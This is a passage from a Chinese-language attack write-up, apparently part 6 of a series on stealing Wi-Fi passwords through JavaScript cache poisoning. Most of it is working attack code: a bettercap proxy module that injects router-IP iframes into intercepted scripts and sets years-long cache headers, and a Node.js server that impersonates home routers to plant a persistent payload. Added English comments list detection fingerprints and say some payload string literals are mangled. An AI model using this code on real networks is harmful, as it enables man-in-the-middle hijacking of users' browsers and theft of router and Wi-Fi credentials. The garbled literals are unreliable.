利用JavaScript缓存远程窃取Wi-Fi密码的思路详解(6)
嵌入这段代码的页面应该缓存在客户端的浏览器中,并以路由器的IP地址作为来源提供。现在让我们暂时把这些代码放一边,讨论一下缓存这段代码所需的网络配置。
正如我刚才所说,上面的JavaScript代码将缓存为来自路由器的IP地址,并将加载到由另一段JavaScript创建的iframe中,第一段JavaScript代码是我在客户端每次请求JavaScript的时候在每个页面中注入的。要完成拦截和注入,我使用了bettercap。Bettercap允许创建HTTP代理模块,可用于对HTTP代理进行编程并告诉它如何操作。例如,可以在将响应传递给客户端之前拦截响应,并决定注入什么,何时注入以及如何注入。因此,我在JavaScript中创建了一个简单的代码,它在bettercap中加载并执行注入。
// Defender note: this is a bettercap HTTP-proxy module (req/res expose
// Hostname, ContentType, ReadBody, SetHeader and Body as used below). It
// rewrites every plain-HTTP JavaScript response that passes through the proxy
// so that the client's browser caches an attacker-controlled body for years.
// Signals a defender can look for, all visible in the headers set below:
// a script URL answered with Content-Type text/html, an Access-Control-Allow-
// Origin wildcard, Cache-Control public,max-age=99936000 (about 3.2 years) and
// a fixed far-future Expires / fixed 1988 Last-Modified pair. Scripts served
// only over HTTPS (with HSTS) cannot be rewritten by such a proxy, and an
// already poisoned entry survives until the browser cache is cleared.
// NOTE(review): the string literals in the payload section appear mangled by
// the page extraction (escape sequences and quoting lost); they are reproduced
// verbatim here, not repaired.
// list of common router's IP .. which definitely requires improvement
var routers = ["192.168.1.1", "192.168.0.1"]
// this function is called when the response is
// received and can be sent back to the client
function onResponse(req, res) {
  // inject only responses containing JavaScript
  // (matches any Content-Type that starts with application/javascript)
  if(res.ContentType.indexOf('application/javascript') == 0 ){
    console.log("caching");
    console.log(req.Hostname)
    var body = res.ReadBody();
    // set caching header
    // Cache-Control is set twice; presumably the later call wins — verify
    // against bettercap's SetHeader semantics.
    res.SetHeader("Cache-Control","max-age=86400");
    res.SetHeader("Content-Type","text/html");
    res.SetHeader("Cache-Control","public, max-age=99936000");
    res.SetHeader("Expires","Wed, 2 Nov 2050 10:00:00 GMT");
    res.SetHeader("Last-Modified","Wed, 2 Nov 1988 10:00:00 GMT");
    res.SetHeader("Access-Control-Allow-Origin:","*");
    // set payload
    // The appended script creates one 640x480 iframe per entry in `routers`
    // after DOMContentLoaded; each iframe points at http://<router IP>, which
    // is what causes the browser to fetch (and cache) whatever answers on
    // those addresses.
    var payload = "document.addEventListener("DOMContentLoaded", function(event){n";
    for(var i=0; i < routers.length; i++){
      payload = payload + "var ifrm = document.createElement('iframe');nifrm.setAttribute('src', 'http://"+routers[i]+"');ifrm.style.width = '640px';ifrm.style.height = '480px';ndocument.body.appendChild(ifrm);n";
    }
    payload = payload + "});";
    // original script body is kept intact; the payload is appended after it
    res.Body = body + payload;
  }
}
有一点值得注意的是,上面的代码中,JavaScript有效载荷会尝试为routers数组中的每个IP 加载一个iframe。这是因为家庭路由器的IP可能配置有所不同。这意味着Raspberry必须响应不同子网上的不同IP。为此,我只需向Raspberry的无线接口添加更多IP就行了。这样,无论加载iframe的代码何时执行,都会对公共路由器的IP地址执行请求,并且Raspberry的无线接口可以伪装成路由器,响应这些请求并缓存我想要的任何内容。
最后,我需要在Raspberry上搭建一个Web服务器,它可以监听无线接口并缓存攻击路由器的JavaScript代码。我先用Nginx做了一些测试,以确保这个想法有效,但最后我选择了Node.JS,主要是因为我还没有使用过Node.JS的HTTP服务器。
// Defender note: a minimal Node.js HTTP server meant to answer on the router
// IPs listed in `routers`. Every response carries the same long-lived cache
// headers, so any page or script fetched from these addresses stays in the
// client's browser cache for years. Fingerprints a defender can match on:
// the non-standard `Server: dribble` header, Cache-Control public,
// max-age=99936000, the fixed 2050 Expires and 1988 Last-Modified values, and
// an Access-Control-Allow-Origin wildcard on a device-management address.
var http = require("http");
// Host+path combinations that receive the index page (root path only)
var routers = ["192.168.0.1/","192.168.1.1/","192.168.1.90/"]
var fs = require('fs');
// load the index web page
var index = fs.readFileSync("./www/index.html");
// load the JavaScript file, which might be more than one
// when support for other router is implemented
var jsob = fs.readdirSync('./www/js');
// request path -> file contents, built once at startup
var repobj = {}
for (var i in jsob){
  // placing a / at the beginning is a bit of a lazy move
  repobj["/"+jsob[i]] = fs.readFileSync('./www/js/' + jsob[i]);
}
var server = http.createServer(function(request, response) {
  // key used for the index lookup: Host header followed by the request path
  var url = request.headers.host + request.url;
  console.log('Request: ' + url);
  console.log("REQUEST URL" + request.url);
  console.log(request.headers);
  var headers = {
    "Content-Type": "text/html",
    "Server": "dribble",
    "Cache-Control": "public, max-age=99936000",
    "Expires": "Wed, 2 Nov 2050 10:00:00 GMT",
    "Last-Modified": "Wed, 2 Nov 1988 10:00:00 GMT",
    "Access-Control-Allow-Origin": "*"
  };
  // Cache the index page
  if (routers.includes(url)) {
    console.log("cache until the end of time");
    response.writeHead(200, headers);
    response.write(index);
    response.end();
    return;
  }
  // cache the JavaScript payload
  // (looked up by request path alone, regardless of Host)
  else if (repobj[request.url]){
    console.log("cache JS until the end of time");
    headers["Content-Type"] = "application/javascript";
    response.writeHead(200, headers);
    response.write(repobj[request.url]);
    response.end();
    return;
  }
  // requests matching neither branch are never answered here (no end())
});
// listen on port 80
server.listen(80);